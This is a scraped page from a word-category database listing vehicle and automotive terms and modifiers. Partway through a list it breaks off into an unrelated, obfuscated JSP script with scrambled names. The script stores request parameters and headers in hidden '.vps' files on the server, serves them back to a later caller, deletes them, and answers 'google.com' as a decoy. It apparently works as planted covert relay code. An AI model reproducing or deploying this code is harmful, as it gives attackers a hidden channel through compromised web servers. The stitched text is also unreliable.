Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Members for Fine-Grained Categories
automotive_vehicle
:
coach,
bus,
truck,
car_radio,
suv,
van,
passenger_bus,
car,
track_vehicle,
bicycle,
automobile,
forklift_truck,
lorry,
hatchback_vehicle,
goods_transporter,
motor_car,
satellite_radio,
non-agricultural_tractor,
recreation_vehicle,
pickup_truck,
rv,
truck_tractor,
electric_car,
wheel,
camper,
trailer,
minivan,
service_vehicle,
flatbed_truck,
light_truck,
motorcycle,
attack_tank,
watercraft,
sedan,
yacht,
rickshaw,
radio,
jeep,
forklift,
small_truck,
train,
police_vehicle,
medium,
engine,
battle_tank,
bulldozer,
tractor,
heavy_truck,
jet,
motor_tricycle,
caravan,
passenger_automobile,
agricultural_tractor,
collection_truck,
limousine,
cargo_van,
wagon,
sport-utility_vehicle,
taxi,
recreational_vehicle,
hatchback,
hearse,
boat,
snowmobile,
ambulance,
tank,
Modifiers matching
vehicle
:
costly,
dangerous,
moving,
large,
quiet,
real,
exotic,
commercial,
impenetrable,
operational,
recreational,
magic,
extra,
rental,
motorized,
sliding,
massive,
specified,
undersea,
larger,
down,
accessible,
domestic,
seasonal,
slow,
oversized,
cultural,
back,
sophisticated,
penetrating,
metal,
special,
heavy,
civil,
military,
rolling,
rugged,
long,
hybrid,
specialized,
foreign,
cleaner,
inside,
agricultural,
ballistic,
pedal,
typical,
crowded,
suburban,
new,
rare,
mechanical,
fleet,
mechanized,
public,
radio,
expensive,
sporting,
naval,
quick,
marine,
modern,
driven,
light,
remote,
additional,
model,
destructive,
lightweight,
comfortable,
indoor,
critical,
smaller,
western,
individual,
advanced,
efficient,
premium,
familiar,
moveable,
electrical,
driving,
wonderful,
combustible,
out,
nautical,
working,
promotional,
movable,
dignified,
inefficient,
common,
covered,
rigid,
traditional,
powerful,
size,
financial,
electronic,
medical,
elevated,
world,
outside,
armoured,
underwater,
soft,
dilapidated,
unique,
flying,
useless,
primary,
actual,
robust,
occupational,
ordinary,
lighter,
unstable,
industrial,
everyday,
usual,
auxiliary,
mobile,
municipal,
old,
big,
friendly,
skinned,
valuable,
urban,
top,
motor,
narrative,
sized,
active,
controlled,
miscellaneous,
original,
automotive,
useful,
terrestrial,
flat,
starting,
unmanned,
topped,
particular,
bulky,
cool,
interactive,
loud,
outdoor,
visible,
enough,
bodied,
portable,
earthbound,
civilian,
slower,
hard,
specialised,
wooden,
small,
conventional,
contemporary,
standard,
unusual,
nonmilitary,
supporting,
noisy,
aerodynamic,
surplus,
utilitarian,
closed,
dynamic,
tactical,
deadly,
technical,
tall,
relevant,
stationary,
virtual,
essential,
refrigerated,
manufactured,
empty,
robotic,
abandoned,
private,
autonomous,
related,
peacekeeping,
appropriate,
flexible,
practical,
immovable,
physical,
airborne,
simple,
editorial,
painted,
complex,
bigger,
fast,
huge,
fighting,
reflective,
temporary,
non-standard,
electric,
disabled,
heavier,
armored,
motorised,
personal,
high,
single,
ancillary,
overhead,
streamlined,
strong,
professional,
local,
static,
urgent,
wide,
base,
floating,
noncommercial,
open,
lethal,
secure,
compact,
functional,
buoyant,
wired,
automatic,
dun,
Simple categories matching
automotive
:
fluid,
lamp,
circuit,
stuff,
part,
bulb,
equipment,
plastic,
unit,
implementation,
actuator,
component,
vehicle,
pump,
boot,
substance,
bus,
metal,
cable,
tool,
surface,
carpet,
item,
work,
relay,
fastener,
appliance,
accessory,
radio,
material,
task,
light,
system,
rail,
residue,
textile,
area,
instrument,
filter,
machine,
transparency,
use,
trade,
liquid,
fuel,
sector,
wax,
business,
measurement,
chemical,
publication,
product,
closure,
thing,
fabric,
devices,
panel,
sensor,
apparatus,
molding,
event,
medium,
service,
industry,
piece,
condition,
gas,
gauge,
shaft,
end,
bushing,
gear,
trim,
spring,
commodity,
fixture,
assembly,
structure,
waste,
device,
meter,
application,
fitting,
motor,
reflector,
brakes,
repair,
paint,
radar,
engine,
machinery,
seat,
superstructure,
substrate,
group,
hardware,
lubricant,
market,
switch,
tyre,
valve,
control,
bearing,
construction,
hose,
body,
lighting,
chains,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>